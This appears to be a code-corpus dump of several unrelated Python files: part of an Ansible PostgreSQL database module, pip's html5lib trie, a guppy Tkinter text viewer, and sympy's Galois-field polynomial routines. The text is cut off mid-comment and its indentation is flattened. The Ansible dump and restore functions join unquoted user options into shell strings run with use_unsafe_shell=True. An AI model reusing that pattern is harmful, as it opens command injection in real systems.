def db_matches(cursor, db, owner, template, encoding, lc_collate, lc_ctype):
if not db_exists(cursor, db):
return False
else:
db_info = get_db_info(cursor, db)
if (encoding and
get_encoding_id(cursor, encoding) != db_info['encoding_id']):
return False
elif lc_collate and lc_collate != db_info['lc_collate']:
return False
elif lc_ctype and lc_ctype != db_info['lc_ctype']:
return False
elif owner and owner != db_info['owner']:
return False
else:
return True
def db_dump(module, target, target_opts="",
db=None,
user=None,
password=None,
host=None,
port=None,
**kw):
flags = login_flags(db, host, port, user, db_prefix=False)
cmd = module.get_bin_path('pg_dump', True)
comp_prog_path = None
if os.path.splitext(target)[-1] == '.tar':
flags.append(' --format=t')
if os.path.splitext(target)[-1] == '.gz':
if module.get_bin_path('pigz'):
comp_prog_path = module.get_bin_path('pigz', True)
else:
comp_prog_path = module.get_bin_path('gzip', True)
elif os.path.splitext(target)[-1] == '.bz2':
comp_prog_path = module.get_bin_path('bzip2', True)
elif os.path.splitext(target)[-1] == '.xz':
comp_prog_path = module.get_bin_path('xz', True)
cmd += "".join(flags)
if target_opts:
cmd += " {0} ".format(target_opts)
if comp_prog_path:
cmd = '{0}|{1} > {2}'.format(cmd, comp_prog_path, pipes.quote(target))
else:
cmd = '{0} > {1}'.format(cmd, pipes.quote(target))
return do_with_password(module, cmd, password)
def db_restore(module, target, target_opts="",
db=None,
user=None,
password=None,
host=None,
port=None,
**kw):
flags = login_flags(db, host, port, user)
comp_prog_path = None
cmd = module.get_bin_path('psql', True)
if os.path.splitext(target)[-1] == '.sql':
flags.append(' --file={0}'.format(target))
elif os.path.splitext(target)[-1] == '.tar':
flags.append(' --format=Tar')
cmd = module.get_bin_path('pg_restore', True)
elif os.path.splitext(target)[-1] == '.gz':
comp_prog_path = module.get_bin_path('zcat', True)
elif os.path.splitext(target)[-1] == '.bz2':
comp_prog_path = module.get_bin_path('bzcat', True)
elif os.path.splitext(target)[-1] == '.xz':
comp_prog_path = module.get_bin_path('xzcat', True)
cmd += "".join(flags)
if target_opts:
cmd += " {0} ".format(target_opts)
if comp_prog_path:
env = os.environ.copy()
if password:
env = {"PGPASSWORD": password}
p1 = subprocess.Popen([comp_prog_path, target], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p2 = subprocess.Popen(cmd, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, env=env)
(stdout2, stderr2) = p2.communicate()
p1.stdout.close()
p1.wait()
if p1.returncode != 0:
stderr1 = p1.stderr.read()
return p1.returncode, '', stderr1, 'cmd: ****'
else:
return p2.returncode, '', stderr2, 'cmd: ****'
else:
cmd = '{0} < {1}'.format(cmd, pipes.quote(target))
return do_with_password(module, cmd, password)
def login_flags(db, host, port, user, db_prefix=True):
"""
returns a list of connection argument strings each prefixed
with a space and quoted where necessary to later be combined
in a single shell string with `"".join(rv)`
db_prefix determines if "--dbname" is prefixed to the db argument,
since the argument was introduced in 9.3.
"""
flags = []
if db:
if db_prefix:
flags.append(' --dbname={0}'.format(pipes.quote(db)))
else:
flags.append(' {0}'.format(pipes.quote(db)))
if host:
flags.append(' --host={0}'.format(host))
if port:
flags.append(' --port={0}'.format(port))
if user:
flags.append(' --username={0}'.format(user))
return flags
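# Illustrative note (added, not in the original): login_flags("acme",
# "db.local", 5432, "admin") returns [' --dbname=acme', ' --host=db.local',
# ' --port=5432', ' --username=admin'], which "".join(flags) collapses into a
# single argument string as the docstring describes.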
def do_with_password(module, cmd, password):
env = {}
if password:
env = {"PGPASSWORD": password}
    rc, stdout, stderr = module.run_command(cmd, use_unsafe_shell=True, environ_update=env)
    return rc, stdout, stderr, cmd
# ===========================================
# Module execution.
#
def main():
argument_spec = pgutils.postgres_common_argument_spec()
argument_spec.update(dict(
db=dict(required=True, aliases=['name']),
owner=dict(default=""),
template=dict(default=""),
encoding=dict(default=""),
lc_collate=dict(default=""),
lc_ctype=dict(default=""),
state=dict(default="present", choices=["absent", "present", "dump", "restore"]),
target=dict(default=""),
target_opts=dict(default=""),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode = True
)
if not HAS_PSYCOPG2:
module.fail_json(msg="the python psycopg2 module is required")
db = module.params["db"]
owner = module.params["owner"]
template = module.params["template"]
encoding = module.params["encoding"]
lc_collate = module.params["lc_collate"]
lc_ctype = module.params["lc_ctype"]
target = module.params["target"]
target_opts = module.params["target_opts"]
state = module.params["state"]
changed = False
# To use defaults values, keyword arguments must be absent, so
# check which values are empty and don't include in the **kw
# dictionary
params_map = {
"login_host":"host",
"login_user":"user",
"login_password":"password",
"port":"port",
"ssl_mode":"sslmode",
"ssl_rootcert":"sslrootcert"
}
kw = dict( (params_map[k], v) for (k, v) in iteritems(module.params)
if k in params_map and v != '' and v is not None)
# If a login_unix_socket is specified, incorporate it here.
is_localhost = "host" not in kw or kw["host"] == "" or kw["host"] == "localhost"
if is_localhost and module.params["login_unix_socket"] != "":
kw["host"] = module.params["login_unix_socket"]
if target == "":
target = "{0}/{1}.sql".format(os.getcwd(), db)
target = os.path.expanduser(target)
else:
target = os.path.expanduser(target)
try:
pgutils.ensure_libs(sslrootcert=module.params.get('ssl_rootcert'))
db_connection = psycopg2.connect(database="postgres", **kw)
# Enable autocommit so we can create databases
if psycopg2.__version__ >= '2.4.2':
db_connection.autocommit = True
else:
db_connection.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
cursor = db_connection.cursor(cursor_factory=psycopg2.extras.DictCursor)
except pgutils.LibraryError as e:
module.fail_json(msg="unable to connect to database: {0}".format(to_native(e)), exception=traceback.format_exc())
except TypeError as e:
if 'sslrootcert' in e.args[0]:
module.fail_json(msg='Postgresql server must be at least version 8.4 to support sslrootcert. Exception: {0}'.format(to_native(e)),
exception=traceback.format_exc())
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
try:
if module.check_mode:
if state == "absent":
changed = db_exists(cursor, db)
elif state == "present":
changed = not db_matches(cursor, db, owner, template, encoding, lc_collate, lc_ctype)
module.exit_json(changed=changed, db=db)
if state == "absent":
try:
changed = db_delete(cursor, db)
except SQLParseError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
elif state == "present":
try:
changed = db_create(cursor, db, owner, template, encoding, lc_collate, lc_ctype)
except SQLParseError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
elif state in ("dump", "restore"):
method = state == "dump" and db_dump or db_restore
try:
rc, stdout, stderr, cmd = method(module, target, target_opts, db, **kw)
if rc != 0:
module.fail_json(msg=stderr, stdout=stdout, rc=rc, cmd=cmd)
else:
module.exit_json(changed=True, msg=stdout, stderr=stderr, rc=rc, cmd=cmd)
except SQLParseError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
except NotSupportedError as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
except SystemExit:
# Avoid catching this on Python 2.4
raise
except Exception as e:
module.fail_json(msg="Database query failed: %s" % to_native(e), exception=traceback.format_exc())
module.exit_json(changed=changed, db=db)
if __name__ == '__main__':
main()
|
boyuegame/kbengine | refs/heads/master | kbe/res/scripts/common/Lib/site-packages/pip/_vendor/html5lib/trie/py.py | 1323 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
from bisect import bisect_left
from ._base import Trie as ABCTrie
class Trie(ABCTrie):
def __init__(self, data):
if not all(isinstance(x, text_type) for x in data.keys()):
raise TypeError("All keys must be strings")
self._data = data
self._keys = sorted(data.keys())
self._cachestr = ""
self._cachepoints = (0, len(data))
def __contains__(self, key):
return key in self._data
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self, prefix=None):
if prefix is None or prefix == "" or not self._keys:
return set(self._keys)
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
start = i = bisect_left(self._keys, prefix, lo, hi)
else:
start = i = bisect_left(self._keys, prefix)
keys = set()
if start == len(self._keys):
return keys
while self._keys[i].startswith(prefix):
keys.add(self._keys[i])
i += 1
self._cachestr = prefix
self._cachepoints = (start, i)
return keys
def has_keys_with_prefix(self, prefix):
if prefix in self._data:
return True
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
i = bisect_left(self._keys, prefix, lo, hi)
else:
i = bisect_left(self._keys, prefix)
if i == len(self._keys):
return False
return self._keys[i].startswith(prefix)
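# Minimal usage sketch (illustrative, not part of the vendored module):
#
# t = Trie({"abc": 1, "abd": 2, "b": 3})
# t.keys("ab") # -> {"abc", "abd"}
# t.has_keys_with_prefix("a") # -> True
#
# Repeated lookups with extending prefixes reuse the cached bisect window
# kept in _cachestr/_cachepoints.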
|
ChenJunor/hue | refs/heads/master | desktop/core/ext-py/guppy-0.1.10/guppy/etc/textView.py | 37 | #._cv_part guppy.etc.textView
# Copied from idlelib/textView
# - I copied it rather than imported since I didn't want
# to have a dependency on idlelib,
# and I can change what I may want.
# For example, I removed the transient and wait window things
# so a help window behaves more like a 'normal' window
"""Simple text browser
"""
from Tkinter import *
import tkMessageBox
class TextViewer(Toplevel):
"""
simple text viewer dialog for idle
"""
def __init__(self, parent, title, fileName=None, data=None):
"""If data exists, load it into viewer, otherwise try to load file.
        fileName - string, should be an absolute filename
"""
Toplevel.__init__(self, parent)
self.configure(borderwidth=5)
self.geometry("=%dx%d+%d+%d" % (625, 500,
parent.winfo_rootx() + 10,
parent.winfo_rooty() + 10))
#elguavas - config placeholders til config stuff completed
self.bg = '#ffffff'
self.fg = '#000000'
self.CreateWidgets()
self.title(title)
#self.transient(parent)
#self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Ok)
self.parent = parent
self.textView.focus_set()
#key bindings for this dialog
self.bind('<Return>',self.Ok) #dismiss dialog
self.bind('<Escape>',self.Ok) #dismiss dialog
if data is not None:
self.textView.insert(0.0, data)
else:
self.LoadTextFile(fileName)
self.textView.config(state=DISABLED)
#self.wait_window()
def LoadTextFile(self, fileName):
textFile = None
try:
textFile = open(fileName, 'r')
except IOError:
tkMessageBox.showerror(title='File Load Error',
                                   message='Unable to load file '+`fileName`+'.')
else:
self.textView.insert(0.0,textFile.read())
def CreateWidgets(self):
frameText = Frame(self, relief=SUNKEN, height=700)
frameButtons = Frame(self)
self.buttonOk = Button(frameButtons, text='Close',
command=self.Ok, takefocus=FALSE)
self.scrollbarView = Scrollbar(frameText, orient=VERTICAL,
takefocus=FALSE, highlightthickness=0)
self.textView = Text(frameText, wrap=WORD, highlightthickness=0,
fg=self.fg, bg=self.bg)
self.scrollbarView.config(command=self.textView.yview)
self.textView.config(yscrollcommand=self.scrollbarView.set)
self.buttonOk.pack()
self.scrollbarView.pack(side=RIGHT,fill=Y)
self.textView.pack(side=LEFT,expand=TRUE,fill=BOTH)
frameButtons.pack(side=BOTTOM,fill=X)
frameText.pack(side=TOP,expand=TRUE,fill=BOTH)
def Ok(self, event=None):
self.destroy()
if __name__ == '__main__':
#test the dialog
root=Tk()
Button(root,text='View',
command=lambda:TextViewer(root,'Text','./textView.py')).pack()
root.mainloop()
|
antepsis/anteplahmacun | refs/heads/master | sympy/polys/galoistools.py | 33 | """Dense univariate polynomials with coefficients in Galois fields. """
from __future__ import print_function, division
from random import uniform
from math import ceil as _ceil, sqrt as _sqrt
from sympy.core.compatibility import SYMPY_INTS, range
from sympy.core.mul import prod
from sympy.polys.polyutils import _sort_factors
from sympy.polys.polyconfig import query
from sympy.polys.polyerrors import ExactQuotientFailed
from sympy.ntheory import factorint
def gf_crt(U, M, K=None):
"""
Chinese Remainder Theorem.
Given a set of integer residues ``u_0,...,u_n`` and a set of
co-prime integer moduli ``m_0,...,m_n``, returns an integer
    ``u``, such that ``u = u_i mod m_i`` for ``i = 0,...,n``.
As an example consider a set of residues ``U = [49, 76, 65]``
and a set of moduli ``M = [99, 97, 95]``. Then we have::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_crt
>>> from sympy.ntheory.modular import solve_congruence
>>> gf_crt([49, 76, 65], [99, 97, 95], ZZ)
639985
This is the correct result because::
>>> [639985 % m for m in [99, 97, 95]]
[49, 76, 65]
Note: this is a low-level routine with no error checking.
See Also
========
sympy.ntheory.modular.crt : a higher level crt routine
sympy.ntheory.modular.solve_congruence
"""
p = prod(M, start=K.one)
v = K.zero
for u, m in zip(U, M):
e = p // m
s, _, _ = K.gcdex(e, m)
v += e*(u*s % m)
return v % p
def gf_crt1(M, K):
"""
First part of the Chinese Remainder Theorem.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_crt1
>>> gf_crt1([99, 97, 95], ZZ)
(912285, [9215, 9405, 9603], [62, 24, 12])
"""
E, S = [], []
p = prod(M, start=K.one)
for m in M:
E.append(p // m)
S.append(K.gcdex(E[-1], m)[0] % m)
return p, E, S
def gf_crt2(U, M, p, E, S, K):
"""
Second part of the Chinese Remainder Theorem.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_crt2
>>> U = [49, 76, 65]
>>> M = [99, 97, 95]
>>> p = 912285
>>> E = [9215, 9405, 9603]
>>> S = [62, 24, 12]
>>> gf_crt2(U, M, p, E, S, ZZ)
639985
"""
v = K.zero
for u, m, e, s in zip(U, M, E, S):
v += e*(u*s % m)
return v % p
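# Note (added for illustration): gf_crt1/gf_crt2 split gf_crt so the
# moduli-only precomputation can be reused across many residue sets:
#
# p, E, S = gf_crt1(M, K)
# assert gf_crt2(U, M, p, E, S, K) == gf_crt(U, M, K)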
def gf_int(a, p):
"""
Coerce ``a mod p`` to an integer in the range ``[-p/2, p/2]``.
Examples
========
>>> from sympy.polys.galoistools import gf_int
>>> gf_int(2, 7)
2
>>> gf_int(5, 7)
-2
"""
if a <= p // 2:
return a
else:
return a - p
def gf_degree(f):
"""
Return the leading degree of ``f``.
Examples
========
>>> from sympy.polys.galoistools import gf_degree
>>> gf_degree([1, 1, 2, 0])
3
>>> gf_degree([])
-1
"""
return len(f) - 1
def gf_LC(f, K):
"""
Return the leading coefficient of ``f``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_LC
>>> gf_LC([3, 0, 1], ZZ)
3
"""
if not f:
return K.zero
else:
return f[0]
def gf_TC(f, K):
"""
Return the trailing coefficient of ``f``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_TC
>>> gf_TC([3, 0, 1], ZZ)
1
"""
if not f:
return K.zero
else:
return f[-1]
def gf_strip(f):
"""
Remove leading zeros from ``f``.
Examples
========
>>> from sympy.polys.galoistools import gf_strip
>>> gf_strip([0, 0, 0, 3, 0, 1])
[3, 0, 1]
"""
if not f or f[0]:
return f
k = 0
for coeff in f:
if coeff:
break
else:
k += 1
return f[k:]
def gf_trunc(f, p):
"""
Reduce all coefficients modulo ``p``.
Examples
========
>>> from sympy.polys.galoistools import gf_trunc
>>> gf_trunc([7, -2, 3], 5)
[2, 3, 3]
"""
return gf_strip([ a % p for a in f ])
def gf_normal(f, p, K):
"""
Normalize all coefficients in ``K``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_normal
>>> gf_normal([5, 10, 21, -3], 5, ZZ)
[1, 2]
"""
return gf_trunc(list(map(K, f)), p)
def gf_from_dict(f, p, K):
"""
Create a ``GF(p)[x]`` polynomial from a dict.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_from_dict
>>> gf_from_dict({10: ZZ(4), 4: ZZ(33), 0: ZZ(-1)}, 5, ZZ)
[4, 0, 0, 0, 0, 0, 3, 0, 0, 0, 4]
"""
n, h = max(f.keys()), []
if isinstance(n, SYMPY_INTS):
for k in range(n, -1, -1):
h.append(f.get(k, K.zero) % p)
else:
(n,) = n
for k in range(n, -1, -1):
h.append(f.get((k,), K.zero) % p)
return gf_trunc(h, p)
def gf_to_dict(f, p, symmetric=True):
"""
Convert a ``GF(p)[x]`` polynomial to a dict.
Examples
========
>>> from sympy.polys.galoistools import gf_to_dict
>>> gf_to_dict([4, 0, 0, 0, 0, 0, 3, 0, 0, 0, 4], 5)
{0: -1, 4: -2, 10: -1}
>>> gf_to_dict([4, 0, 0, 0, 0, 0, 3, 0, 0, 0, 4], 5, symmetric=False)
{0: 4, 4: 3, 10: 4}
"""
n, result = gf_degree(f), {}
for k in range(0, n + 1):
if symmetric:
a = gf_int(f[n - k], p)
else:
a = f[n - k]
if a:
result[k] = a
return result
def gf_from_int_poly(f, p):
"""
Create a ``GF(p)[x]`` polynomial from ``Z[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_from_int_poly
>>> gf_from_int_poly([7, -2, 3], 5)
[2, 3, 3]
"""
return gf_trunc(f, p)
def gf_to_int_poly(f, p, symmetric=True):
"""
Convert a ``GF(p)[x]`` polynomial to ``Z[x]``.
Examples
========
>>> from sympy.polys.galoistools import gf_to_int_poly
>>> gf_to_int_poly([2, 3, 3], 5)
[2, -2, -2]
>>> gf_to_int_poly([2, 3, 3], 5, symmetric=False)
[2, 3, 3]
"""
if symmetric:
return [ gf_int(c, p) for c in f ]
else:
return f
def gf_neg(f, p, K):
"""
Negate a polynomial in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_neg
>>> gf_neg([3, 2, 1, 0], 5, ZZ)
[2, 3, 4, 0]
"""
return [ -coeff % p for coeff in f ]
def gf_add_ground(f, a, p, K):
"""
Compute ``f + a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_add_ground
>>> gf_add_ground([3, 2, 4], 2, 5, ZZ)
[3, 2, 1]
"""
if not f:
a = a % p
else:
a = (f[-1] + a) % p
if len(f) > 1:
return f[:-1] + [a]
if not a:
return []
else:
return [a]
def gf_sub_ground(f, a, p, K):
"""
Compute ``f - a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sub_ground
>>> gf_sub_ground([3, 2, 4], 2, 5, ZZ)
[3, 2, 2]
"""
if not f:
a = -a % p
else:
a = (f[-1] - a) % p
if len(f) > 1:
return f[:-1] + [a]
if not a:
return []
else:
return [a]
def gf_mul_ground(f, a, p, K):
"""
Compute ``f * a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_mul_ground
>>> gf_mul_ground([3, 2, 4], 2, 5, ZZ)
[1, 4, 3]
"""
if not a:
return []
else:
return [ (a*b) % p for b in f ]
def gf_quo_ground(f, a, p, K):
"""
Compute ``f/a`` where ``f`` in ``GF(p)[x]`` and ``a`` in ``GF(p)``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_quo_ground
>>> gf_quo_ground(ZZ.map([3, 2, 4]), ZZ(2), 5, ZZ)
[4, 1, 2]
"""
return gf_mul_ground(f, K.invert(a, p), p, K)
def gf_add(f, g, p, K):
"""
Add polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_add
>>> gf_add([3, 2, 4], [2, 2, 2], 5, ZZ)
[4, 1]
"""
if not f:
return g
if not g:
return f
df = gf_degree(f)
dg = gf_degree(g)
if df == dg:
return gf_strip([ (a + b) % p for a, b in zip(f, g) ])
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = g[:k], g[k:]
return h + [ (a + b) % p for a, b in zip(f, g) ]
def gf_sub(f, g, p, K):
"""
Subtract polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sub
>>> gf_sub([3, 2, 4], [2, 2, 2], 5, ZZ)
[1, 0, 2]
"""
if not g:
return f
if not f:
return gf_neg(g, p, K)
df = gf_degree(f)
dg = gf_degree(g)
if df == dg:
return gf_strip([ (a - b) % p for a, b in zip(f, g) ])
else:
k = abs(df - dg)
if df > dg:
h, f = f[:k], f[k:]
else:
h, g = gf_neg(g[:k], p, K), g[k:]
return h + [ (a - b) % p for a, b in zip(f, g) ]
def gf_mul(f, g, p, K):
"""
Multiply polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_mul
>>> gf_mul([3, 2, 4], [2, 2, 2], 5, ZZ)
[1, 0, 3, 2, 3]
"""
df = gf_degree(f)
dg = gf_degree(g)
dh = df + dg
h = [0]*(dh + 1)
for i in range(0, dh + 1):
coeff = K.zero
for j in range(max(0, i - dg), min(i, df) + 1):
coeff += f[j]*g[i - j]
h[i] = coeff % p
return gf_strip(h)
def gf_sqr(f, p, K):
"""
Square polynomials in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sqr
>>> gf_sqr([3, 2, 4], 5, ZZ)
[4, 2, 3, 1, 1]
"""
df = gf_degree(f)
dh = 2*df
h = [0]*(dh + 1)
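    # Each coefficient of f**2 is sum(f[j]*f[i - j]); by symmetry only the
    # first half of the products is summed, the partial sum is doubled, and
    # the middle square f[jmax + 1]**2 is added when the term count is odd.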
for i in range(0, dh + 1):
coeff = K.zero
jmin = max(0, i - df)
jmax = min(i, df)
n = jmax - jmin + 1
jmax = jmin + n // 2 - 1
for j in range(jmin, jmax + 1):
coeff += f[j]*f[i - j]
coeff += coeff
if n & 1:
elem = f[jmax + 1]
coeff += elem**2
h[i] = coeff % p
return gf_strip(h)
def gf_add_mul(f, g, h, p, K):
"""
Returns ``f + g*h`` where ``f``, ``g``, ``h`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_add_mul
>>> gf_add_mul([3, 2, 4], [2, 2, 2], [1, 4], 5, ZZ)
[2, 3, 2, 2]
"""
return gf_add(f, gf_mul(g, h, p, K), p, K)
def gf_sub_mul(f, g, h, p, K):
"""
Compute ``f - g*h`` where ``f``, ``g``, ``h`` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_sub_mul
>>> gf_sub_mul([3, 2, 4], [2, 2, 2], [1, 4], 5, ZZ)
[3, 3, 2, 1]
"""
return gf_sub(f, gf_mul(g, h, p, K), p, K)
def gf_expand(F, p, K):
"""
Expand results of :func:`factor` in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_expand
>>> gf_expand([([3, 2, 4], 1), ([2, 2], 2), ([3, 1], 3)], 5, ZZ)
[4, 3, 0, 3, 0, 1, 4, 1]
"""
if type(F) is tuple:
lc, F = F
else:
lc = K.one
g = [lc]
for f, k in F:
f = gf_pow(f, k, p, K)
g = gf_mul(g, f, p, K)
return g
def gf_div(f, g, p, K):
"""
Division with remainder in ``GF(p)[x]``.
Given univariate polynomials ``f`` and ``g`` with coefficients in a
finite field with ``p`` elements, returns polynomials ``q`` and ``r``
(quotient and remainder) such that ``f = q*g + r``.
Consider polynomials ``x**3 + x + 1`` and ``x**2 + x`` in GF(2)::
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_div, gf_add_mul
>>> gf_div(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
([1, 1], [1])
As result we obtained quotient ``x + 1`` and remainder ``1``, thus::
>>> gf_add_mul(ZZ.map([1]), ZZ.map([1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
[1, 0, 1, 1]
References
==========
1. [Monagan93]_
2. [Gathen99]_
"""
df = gf_degree(f)
dg = gf_degree(g)
if not g:
raise ZeroDivisionError("polynomial division")
elif df < dg:
return [], f
inv = K.invert(g[0], p)
h, dq, dr = list(f), df - dg, dg - 1
for i in range(0, df + 1):
coeff = h[i]
for j in range(max(0, dg - i), min(df - i, dr) + 1):
coeff -= h[i + j - dg] * g[dg - j]
if i <= dq:
coeff *= inv
h[i] = coeff % p
return h[:dq + 1], gf_strip(h[dq + 1:])
def gf_rem(f, g, p, K):
"""
Compute polynomial remainder in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_rem
>>> gf_rem(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
[1]
"""
return gf_div(f, g, p, K)[1]
def gf_quo(f, g, p, K):
"""
Compute exact quotient in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_quo
>>> gf_quo(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
[1, 1]
>>> gf_quo(ZZ.map([1, 0, 3, 2, 3]), ZZ.map([2, 2, 2]), 5, ZZ)
[3, 2, 4]
"""
df = gf_degree(f)
dg = gf_degree(g)
if not g:
raise ZeroDivisionError("polynomial division")
elif df < dg:
return []
inv = K.invert(g[0], p)
h, dq, dr = f[:], df - dg, dg - 1
for i in range(0, dq + 1):
coeff = h[i]
for j in range(max(0, dg - i), min(df - i, dr) + 1):
coeff -= h[i + j - dg] * g[dg - j]
h[i] = (coeff * inv) % p
return h[:dq + 1]
def gf_exquo(f, g, p, K):
"""
Compute polynomial quotient in ``GF(p)[x]``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_exquo
>>> gf_exquo(ZZ.map([1, 0, 3, 2, 3]), ZZ.map([2, 2, 2]), 5, ZZ)
[3, 2, 4]
>>> gf_exquo(ZZ.map([1, 0, 1, 1]), ZZ.map([1, 1, 0]), 2, ZZ)
Traceback (most recent call last):
...
ExactQuotientFailed: [1, 1, 0] does not divide [1, 0, 1, 1]
"""
q, r = gf_div(f, g, p, K)
if not r:
return q
else:
raise ExactQuotientFailed(f, g)
def gf_lshift(f, n, K):
"""
Efficiently multiply ``f`` by ``x**n``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_lshift
>>> gf_lshift([3, 2, 4], 4, ZZ)
[3, 2, 4, 0, 0, 0, 0]
"""
if not f:
return f
else:
return f + [K.zero]*n
def gf_rshift(f, n, K):
"""
Efficiently divide ``f`` by ``x**n``.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_rshift
>>> gf_rshift([1, 2, 3, 4, 0], 3, ZZ)
([1, 2], [3, 4, 0])
"""
if not n:
return f, []
else:
return f[:-n], f[-n:]
def gf_pow(f, n, p, K):
"""
Compute ``f**n`` in ``GF(p)[x]`` using repeated squaring.
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_pow
>>> gf_pow([3, 2, 4], 3, 5, ZZ)
[2, 4, 4, 2, 2, 1, 4]
"""
if not n:
return [K.one]
elif n == 1:
return f
elif n == 2:
return gf_sqr(f, p, K)
h = [K.one]
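    # Binary exponentiation: consume the bits of ``n`` from the low end,
    # multiplying the accumulator ``h`` by the current power of ``f`` for each
    # set bit and squaring ``f`` between bits.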
while True:
if n & 1:
h = gf_mul(h, f, p, K)
n -= 1
n >>= 1
if not n:
break
f = gf_sqr(f, p, K)
return h
def gf_frobenius_monomial_base(g, p, K):
"""
return the list of ``x**(i*p) mod g in Z_p`` for ``i = 0, .., n - 1``
where ``n = gf_degree(g)``
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_frobenius_monomial_base
>>> g = ZZ.map([1, 0, 2, 1])
>>> gf_frobenius_monomial_base(g, 5, ZZ)
[[1], [4, 4, 2], [1, 2]]
"""
n = gf_degree(g)
if n == 0:
return []
b = [0]*n
b[0] = [1]
if p < n:
for i in range(1, n):
mon = gf_lshift(b[i - 1], p, K)
b[i] = gf_rem(mon, g, p, K)
elif n > 1:
b[1] = gf_pow_mod([K.one, K.zero], p, g, p, K)
for i in range(2, n):
b[i] = gf_mul(b[i - 1], b[1], p, K)
b[i] = gf_rem(b[i], g, p, K)
return b
def gf_frobenius_map(f, g, b, p, K):
"""
compute gf_pow_mod(f, p, g, p, K) using the Frobenius map
Parameters
==========
f, g : polynomials in ``GF(p)[x]``
b : frobenius monomial base
p : prime number
K : domain
Examples
========
>>> from sympy.polys.domains import ZZ
>>> from sympy.polys.galoistools import gf_frobenius_monomial_base, gf_frobenius_map
>>> f = ZZ.map([2, 1 , 0, 1])
>>> g = ZZ.map([1, 0, 2, 1])
>>> p = 5
>>> b = gf_frobenius_monomial_base(g, p, ZZ)
>>> r = gf_frobenius_map(f, g, b, p, ZZ)
>>> gf_frobenius_map(f, g, b, p, ZZ)
[4, 0, 3]
"""
m = gf_degree(g)
if gf_degree(f) >= m:
f = gf_rem(f, g, p, K)
if not f:
return []
n = gf_degree(f)
sf = [f[-1]]
for i in range(1, n + 1):
v = gf_mul_ground(b[i], f[n - i], p, K)
sf = gf_add(sf, v, p, K)
return sf
def _gf_pow_pnm1d2(f, n, g, b, p, K):
"""
utility function for ``gf_edf_zassenhaus``
Compute ``f**((p**n - 1) // 2)`` in ``GF(p)[x]/(g)``
    ``f**((p**n - 1) // 2) = (f*f**p*...*f**(p**(n - 1)))**((p - 1) // 2)``
"""
f = gf_rem(f, g, p, K)
h = f
r = f
for i in range(1, n):
h = gf_frobenius_map(h, g, b, p, K)
r = gf_mul(r, h, p, K)
r = gf_rem(r, g, p, K)
res = gf_pow_mod(r, (p - 1)//2, g, p, K)
return res
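# Worked check (added, not in the original source): with n = 1 the loop is
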